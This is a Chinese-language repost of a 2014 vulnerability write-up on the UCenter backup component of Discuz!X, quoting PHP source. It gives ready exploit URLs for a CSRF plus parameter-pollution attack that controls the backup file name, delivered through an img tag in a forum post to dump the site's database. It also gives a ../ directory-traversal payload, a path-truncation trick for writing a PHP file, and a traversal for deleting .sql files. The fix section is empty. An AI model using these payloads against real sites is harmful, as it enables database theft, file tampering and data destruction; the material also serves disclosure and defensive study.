记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Discuz!X一个为所欲为的csrf+hpp(站点脱裤,任意文件文件操作,目录穿越,可能其他cms躺着中枪)

2014-12-14 04:30

此漏洞来自dz公司的ucenter,这个ucenter,应该是在数据库备份操作时候,没有做csrf防御可导致dz被文件操作,脱裤等等,开始分析:

30.png





下来我们分析代码:

uc_server\control\admin\db.php:(85-ll6行):

code 区域
function onoperate() {

require_once UC_ROOT.'lib/xml.class.php';

$nexturl = getgpc('nexturl');

$appid = intval(getgpc('appid'));

$type = getgpc('t') == 'import' ? 'import' : 'export';

$backupdir = getgpc('backupdir');

$app = $this->cache['apps'][$appid];

if($nexturl) {

$url = $nexturl;

} else {

if($appid) {

if(!isset($this->cache['apps'][$appid])) {

$this->message($this->_parent_js($appid, 'appid_invalid'));

}

if($app['type'] == 'DISCUZX') {

$url = $app['url'].'/api/db/dbbak.php?apptype='.$app['type'];

} else {

$url = $app['url'].'/api/dbbak.php?apptype='.$app['type'];

}

$code = $this->authcode('&method='.$type.'&sqlpath='.$backupdir.'&time='.time(), 'ENCODE', $app['authkey']);

} else {

$url = 'http://'.$_SERVER['HTTP_HOST'].str_replace('admin.php', 'api/dbbak.php', $_SERVER['PHP_SELF']).'?apptype=UCENTER';

$code = $this->authcode('&method='.$type.'&sqlpath='.$backupdir.'&time='.time(), 'ENCODE', UC_KEY);

}

$url .= '&code='.urlencode($code);

}

if(empty($appid)) {

$app['ip'] = defined('UC_IP') ? UC_IP : '';

}

$res = $_ENV['misc']->dfopen2($url, 0, '', '', 1, $app['ip'], 20, TRUE);

if(empty($res)) {

$this->message($this->_parent_js($appid, 'db_back_api_url_invalid'));







这里的意思就是,当你发送一个get请求之后,然后php内部通过fopen完成剩下的所有动作,漏洞产生在哪里呢:

code 区域
$url = 'http://'.$_SERVER['HTTP_HOST'].str_replace('admin.php', 'api/dbbak.php', $_SERVER['PHP_SELF']).'?apptype=UCENTER';

$code = $this->authcode('&method='.$type.'&sqlpath='.$backupdir.'&time='.time(), 'ENCODE', UC_KEY);





看到这两句了没有,举个例子吧:

我们提交的http请求如果是:

http://site.com/index.php?a=1&b=2



那么当我们b传递进来的时候重新二次构造url,如果我们的b=xxxx%26backupfilename%3Daaaa

这里时候等于在内部通过fopen发送get请求时候后面多添加了一个参数交个backupfilename=aaaa



看到这个解释,就恍然大悟了吧,肯定后面有怎么设置backupfilename,本来这里是不会被用户更改的,这样已设置,我们备份的文件名字可控了,直接可以拿到,在看代码:



uc_server\api\dbbak.php:(255-334):

code 区域
if($get['method'] == 'export') {



$db->query('SET SQL_QUOTE_SHOW_CREATE=0', 'SILENT');



$time = date("Y-m-d H:i:s", $timestamp);



$tables = array();

$tables = arraykeys2(fetchtablelist($tablepre), 'Name');



if($apptype == 'discuz') {

$query = $db->query("SELECT datatables FROM {$tablepre}plugins WHERE datatables<>''");

while($plugin = $db->fetch_array($query)) {

foreach(explode(',', $plugin['datatables']) as $table) {

if($table = trim($table)) {

$tables[] = $table;

}

}

}

}



$get['volume'] = isset($get['volume']) ? intval($get['volume']) : 0;

$get['volume'] = $get['volume'] + 1;

$version = $version ? $version : $apptype;

$idstring = '# Identify: '.base64_encode("$timestamp,$version,$apptype,multivol,$get[volume]")."\n";



if(!isset($get['sqlpath']) || empty($get['sqlpath'])) {

$get['sqlpath'] = 'backup_'.date('ymd', $timestamp).'_'.random(6);

if(!mkdir(BACKUP_DIR.'./'.$get['sqlpath'], 0777)) {

api_msg('mkdir_error', 'make dir error:'.BACKUP_DIR.'./'.$get['sqlpath']);

}

} elseif(!is_dir(BACKUP_DIR.'./'.$get['sqlpath'])) {

if(!mkdir(BACKUP_DIR.'./'.$get['sqlpath'], 0777)) {

api_msg('mkdir_error', 'make dir error:'.BACKUP_DIR.'./'.$get['sqlpath']);

}

}

if(!isset($get['backupfilename']) || empty($get['backupfilename'])) {

$get['backupfilename'] = date('ymd', $timestamp).'_'.random(6);

}



$sqldump = '';

$get['tableid'] = isset($get['tableid']) ? intval($get['tableid']) : 0;

$get['startfrom'] = isset($get['startfrom']) ? intval($get['startfrom']) : 0;



$complete = TRUE;

for(; $complete && $get['tableid'] < count($tables) && strlen($sqldump) + 500 < $sizelimit * 1000; $get['tableid']++) {

$sqldump .= sqldumptable($tables[$get['tableid']], strlen($sqldump));

if($complete) {

$get['startfrom'] = 0;

}

}



!$complete && $get['tableid']--;

$dumpfile = BACKUP_DIR.$get['sqlpath'].'/'.$get['backupfilename'].'-'.$get['volume'].'.sql';

if(trim($sqldump)) {

$sqldump = "$idstring".

"# <?php exit();?>\n".

"# $apptype Multi-Volume Data Dump Vol.$get[volume]\n".

"# Time: $time\n".

"# Type: $apptype\n".

"# Table Prefix: $tablepre\n".

"# $dbcharset\n".

"# $apptype Home: http://www.comsenz.com\n".

"# Please visit our website for newest infomation about $apptype\n".

"# --------------------------------------------------------\n\n\n".

$sqldump;



@$fp = fopen($dumpfile, 'wb');

@flock($fp, 2);

if(@!fwrite($fp, $sqldump)) {

@fclose($fp);

api_msg('database_export_file_invalid', $dumpfile);

} else {

fclose($fp);

auto_next($get, $dumpfile);

}

} else {

@touch(ROOT_PATH.$get['sqlpath'].'/index.htm');

api_msg('explor_success', 'explor_success');

}





我们主要看着一句:

code 区域
if(!isset($get['backupfilename']) || empty($get['backupfilename'])) {

$get['backupfilename'] = date('ymd', $timestamp).'_'.random(6);

}







刚才我们举例子了,按照这个逻辑走那么我们就会绕过去,不会在这里创建一个6个字符的随机数文件名



这里为了举例子,我们摘出来其中一部分sql备份:



url:http://192.168.10.70/discuz_x3.2_sc_utf8/upload/uc_server/admin.php?m=db&a=operate&t=export&appid=0&backupdir=xxxx%26backupfilename%3Daaaa





按照程序的逻辑,这句话的意思就是在xxxx目录底下备份一个aaaa-1.sql



我们访问一下:

31.png





我们去这个目录看看是否已经生成备份文件:

32.png







有了这个我们害怕什么,很简单的一个get csrf,这时候我们在论坛发送一个img

<img src=http://192.168.10.70/discuz_x3.2_sc_utf8/upload/uc_server/admin.php?m=db&a=operate&t=export&appid=0&backupdir=xxxx%26backupfilename%3Daaaa>



一切都搞定......关于这里怎么利用,方法太多了





下来我们看第二个漏洞目录穿越:



这里的backupdir 居然没有做任何限制,所以我们可以再操作系统内部随意创建文件夹

并且把备份的文件给写入进去,想想都可怕,如果dz的数据库非常强大,我这里只要一个死循环,分分钟让硬盘爆满:



url:http://192.168.10.70/discuz_x3.2_sc_utf8/upload/uc_server/admin.php?m=db&a=operate&t=export&appid=0&backupdir=../../../../../../../../../../../../../../../../../xxxx



这时候我们去根目录看看:

33.png







有人说gpc开着那么我们就没有办法阶段这一句代码:

code 区域
!$complete && $get['tableid']--;

$dumpfile = BACKUP_DIR.$get['sqlpath'].'/'.$get['backupfilename'].'-'.$get['volume'].'.sql';







说的一点都没有错,因为我们这个$get['backupfilename']是完全可控的,如果我们发送%00这里会被gpc转义为\0不会被截短,但是在linux底下就不一样了,每个文件达到一定长度时候它自然就被截断了,举个例子:

code 区域
$a='';



  for($i=0;$i<=4071;$i++) {



  $a .= '/';



  }



  $a = 'test.txt'.$a; //完整的路径为/var/www/test/test.txt



  require_once($a.'.php');



  ?>





在Linux环境下测试,你会发现'.php'被截断了.这时候我们就可以写一个php文件了,不做演示了,主要漏洞点演示完毕



下来我们再看一个文件删除的地方:

code 区域
elseif($get['method'] == 'delete') {



$sqlpath = trim($get['sqlpath']);

if(empty($sqlpath) || !is_dir(BACKUP_DIR.$sqlpath)) {

api_msg('dir_no_exists', $sqlpath);

}

$directory = dir(BACKUP_DIR.$sqlpath);

while($entry = $directory->read()) {

$filename = BACKUP_DIR.$sqlpath.'/'.$entry;

if(is_file($filename) && preg_match('/\d+_\w+\-(\d+).sql$/', $filename) && !@unlink($filename)) {

api_msg('delete_dumpfile_error', $filename);

}

}

$directory->close();

@rmdir(BACKUP_DIR.$sqlpath);

api_msg('delete_sqlpath_success', 'delete_sqlpath_success');



}







这里的逻辑就是删除某个目录底下的以sql后缀的文件,然后删除改文件夹,当然了这个文件夹如果是空的,那么我也就直接删除,非空是删不掉的



由于$sqlpath 路径完全可控,所以导致,可以再某一个盘符底下任意穿越删除sql文件,不管你是其他备份的还是这里自己生成的一概删掉



反正有了这个fopen的参数污染bug,那么应该还有好多地方存在问题,这里就不一一说了



再付最后一张图:

34.png





35.png







这些 我想就不用分析了吧,都是嵌入应用.........

ok

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2014-076080

阅读:177142 | 评论:0 | 标签:CSRF cms discuz

想收藏或者和大家分享这篇好文章→复制链接地址

“Discuz!X一个为所欲为的csrf+hpp(站点脱裤,任意文件文件操作,目录穿越,可能其他cms躺着中枪)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云